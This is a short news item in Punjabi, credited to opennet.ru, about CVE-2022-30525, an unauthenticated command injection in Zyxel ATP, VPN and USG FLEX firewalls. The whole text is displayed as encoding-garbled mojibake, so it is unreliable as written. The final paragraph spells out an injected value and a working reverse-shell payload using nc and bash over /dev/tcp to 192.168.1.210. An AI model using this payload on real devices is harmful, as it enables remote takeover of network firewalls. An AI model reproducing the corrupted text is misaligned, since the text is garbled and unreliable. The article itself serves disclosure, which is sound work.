Zyxel เจซเจพเจ‡เจฐเจตเจพเจฒเจพเจ‚ เจตเจฟเฉฑเจš เจ•เจฎเจœเจผเฉ‹เจฐเฉ€ เจœเฉ‹ เจชเฉเจฐเจฎเจพเจฃเจฟเจ•เจคเจพ เจคเฉ‹เจ‚ เจฌเจฟเจจเจพเจ‚ เจ•เฉ‹เจก เจจเฉ‚เฉฐ เจšเจฒเจพเจ‰เจฃ เจฆเฉ€ เจ†เจ—เจฟเจ† เจฆเจฟเฉฐเจฆเฉ€ เจนเฉˆ

ATP, VPN เจ…เจคเฉ‡ USG FLEX เจธเฉ€เจฐเฉ€เจœเจผ เจฆเฉ‡ Zyxel เจกเจฟเจตเจพเจˆเจธเจพเจ‚ เจตเจฟเฉฑเจš เจ‡เฉฑเจ• เจจเจพเจœเจผเฉเจ• เจ•เจฎเจœเจผเฉ‹เจฐเฉ€ (CVE-2022-30525) เจฆเฉ€ เจชเจ›เจพเจฃ เจ•เฉ€เจคเฉ€ เจ—เจˆ เจนเฉˆ, เจœเฉ‹ เจ•เจฟ เจ‰เฉฑเจฆเจฎเจพเจ‚ เจตเจฟเฉฑเจš เจซเจพเจ‡เจฐเจตเจพเจฒเจพเจ‚, IDS เจ…เจคเฉ‡ VPN เจฆเฉ‡ เจธเฉฐเจšเจพเจฒเจจ เจจเฉ‚เฉฐ เจธเฉฐเจ—เจ เจฟเจค เจ•เจฐเจจ เจฒเจˆ เจคเจฟเจ†เจฐ เจ•เฉ€เจคเจพ เจ—เจฟเจ† เจนเฉˆ, เจœเฉ‹ เจ‡เฉฑเจ• เจฌเจพเจนเจฐเฉ€ เจนเจฎเจฒเจพเจตเจฐ เจจเฉ‚เฉฐ เจ•เฉ‹เจก เจจเฉ‚เฉฐ เจšเจฒเจพเจ‰เจฃ เจฆเฉ€ เจ†เจ—เจฟเจ† เจฆเจฟเฉฐเจฆเจพ เจนเฉˆเฅค เจชเฉเจฐเจฎเจพเจฃเจฟเจ•เจคเจพ เจคเฉ‹เจ‚ เจฌเจฟเจจเจพเจ‚ เจ‰เจชเจญเฉ‹เจ—เจคเจพ เจ…เจงเจฟเจ•เจพเจฐเจพเจ‚ เจคเฉ‹เจ‚ เจฌเจฟเจจเจพเจ‚ เจกเจฟเจตเจพเจˆเจธเฅค เจนเจฎเจฒเจพ เจ•เจฐเจจ เจฒเจˆ, เจนเจฎเจฒเจพเจตเจฐ เจจเฉ‚เฉฐ HTTP/HTTPS เจชเฉเจฐเฉ‹เจŸเฉ‹เจ•เฉ‹เจฒ เจฆเฉ€ เจตเจฐเจคเฉ‹เจ‚ เจ•เจฐเจ•เฉ‡ เจกเจฟเจตเจพเจˆเจธ เจจเฉ‚เฉฐ เจฌเฉ‡เจจเจคเฉ€เจ†เจ‚ เจญเฉ‡เจœเจฃ เจฆเฉ‡ เจฏเฉ‹เจ— เจนเฉ‹เจฃเจพ เจšเจพเจนเฉ€เจฆเจพ เจนเฉˆเฅค Zyxel เจจเฉ‡ ZLD 5.30 เจซเจฐเจฎเจตเฉ‡เจ…เจฐ เจ…เจชเจกเฉ‡เจŸ เจตเจฟเฉฑเจš เจ•เจฎเจœเจผเฉ‹เจฐเฉ€ เจจเฉ‚เฉฐ เจ เฉ€เจ• เจ•เฉ€เจคเจพ เจนเฉˆเฅค เจธเจผเฉ‹เจกเจจ เจธเฉ‡เจตเจพ เจฆเฉ‡ เจ…เจจเฉเจธเจพเจฐ, เจ—เจฒเฉ‹เจฌเจฒ เจจเฉˆเฉฑเจŸเจตเจฐเจ• 'เจคเฉ‡ เจตเจฐเจคเจฎเจพเจจ เจตเจฟเฉฑเจš 16213 เจธเฉฐเจญเจพเจตเฉ€ เจคเฉŒเจฐ 'เจคเฉ‡ เจ•เจฎเจœเจผเฉ‹เจฐ เจ‰เจชเจ•เจฐเจฃ เจนเจจ เจœเฉ‹ HTTP/HTTPS เจฆเฉเจ†เจฐเจพ เจฌเฉ‡เจจเจคเฉ€เจ†เจ‚ เจจเฉ‚เฉฐ เจธเจตเฉ€เจ•เจพเจฐ เจ•เจฐเจฆเฉ‡ เจนเจจเฅค

เจ“เจชเจฐเฉ‡เจธเจผเจจ เจตเฉˆเฉฑเจฌ เจนเฉˆเจ‚เจกเจฒเจฐ /ztp/cgi-bin/handler เจจเฉ‚เฉฐ เจตเจฟเจธเจผเฉ‡เจธเจผ เจคเฉŒเจฐ 'เจคเฉ‡ เจกเจฟเจœเจผเจพเจˆเจจ เจ•เฉ€เจคเฉ€เจ†เจ‚ เจ•เจฎเจพเจ‚เจกเจพเจ‚ เจญเฉ‡เจœ เจ•เฉ‡ เจ•เฉ€เจคเจพ เจœเจพเจ‚เจฆเจพ เจนเฉˆ, เจฌเจฟเจจเจพเจ‚ เจชเฉเจฐเจฎเจพเจฃเจฟเจ•เจคเจพ เจฆเฉ‡ เจชเจนเฉเฉฐเจšเจฏเฉ‹เจ—เฅค เจ‡เจน เจธเจฎเฉฑเจธเจฟเจ† lib_wan_settings.py เจฒเจพเจ‡เจฌเฉเจฐเฉ‡เจฐเฉ€ เจตเจฟเฉฑเจš เจตเจฐเจคเฉ€ เจ—เจˆ os.system เจ•เจพเจฒ เจฆเฉ€ เจตเจฐเจคเฉ‹เจ‚ เจ•เจฐเจ•เฉ‡ เจธเจฟเจธเจŸเจฎ เจ‰เฉฑเจคเฉ‡ เจ•เจฎเจพเจ‚เจกเจพเจ‚ เจจเฉ‚เฉฐ เจšเจฒเจพเจ‰เจฃ เจตเฉ‡เจฒเฉ‡ เจ…เจคเฉ‡ setWanPortSt เจ“เจชเจฐเฉ‡เจธเจผเจจ เจฆเฉ€ เจชเฉเจฐเจ•เจฟเจฐเจฟเจ† เจ•เจฐเจจ เจตเฉ‡เจฒเฉ‡ เจฒเจพเจ—เฉ‚ เจ•เจฐเจจ เจตเฉ‡เจฒเฉ‡ เจฌเฉ‡เจจเจคเฉ€ เจชเฉˆเจฐเจพเจฎเฉ€เจŸเจฐเจพเจ‚ เจฆเฉ€ เจธเจนเฉ€ เจธเจซเจพเจˆ เจฆเฉ€ เจ˜เจพเจŸ เจ•เจพเจฐเจจ เจนเฉเฉฐเจฆเฉ€ เจนเฉˆเฅค

เจ‰เจฆเจพเจนเจฐเจจ เจฒเจˆ, เจ‡เฉฑเจ• เจนเจฎเจฒเจพเจตเจฐ เจธเจคเจฐ เจชเจพเจธ เจ•เจฐ เจธเจ•เจฆเจพ เจนเฉˆ โ€œ; เจชเจฟเฉฐเจ— 192.168.1.210;" เจœเฉ‹ เจธเจฟเจธเจŸเจฎ เจ‰เฉฑเจคเฉ‡ "เจชเจฟเฉฐเจ— 192.168.1.210" เจ•เจฎเจพเจ‚เจก เจจเฉ‚เฉฐ เจฒเจพเจ—เฉ‚ เจ•เจฐเจจ เจฆเฉ€ เจ…เจ—เจตเจพเจˆ เจ•เจฐเฉ‡เจ—เจพเฅค เจ•เจฎเจพเจ‚เจก เจธเจผเฉˆเฉฑเจฒ เจคเฉฑเจ• เจชเจนเฉเฉฐเจš เจชเฉเจฐเจพเจชเจค เจ•เจฐเจจ เจฒเจˆ, เจคเฉเจธเฉ€เจ‚ เจ†เจชเจฃเฉ‡ เจธเจฟเจธเจŸเจฎ เจ‰เฉฑเจคเฉ‡ โ€œnc -lvnp 1270โ€ เจšเจฒเจพ เจธเจ•เจฆเฉ‡ เจนเฉ‹, เจ…เจคเฉ‡ เจซเจฟเจฐ '; bash -c \ยปexec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\ยป;โ€™เฅค

เจธเจฐเฉ‹เจค: opennet.ru

เจ‡เฉฑเจ• เจŸเจฟเฉฑเจชเจฃเฉ€ เจœเฉ‹เฉœเฉ‹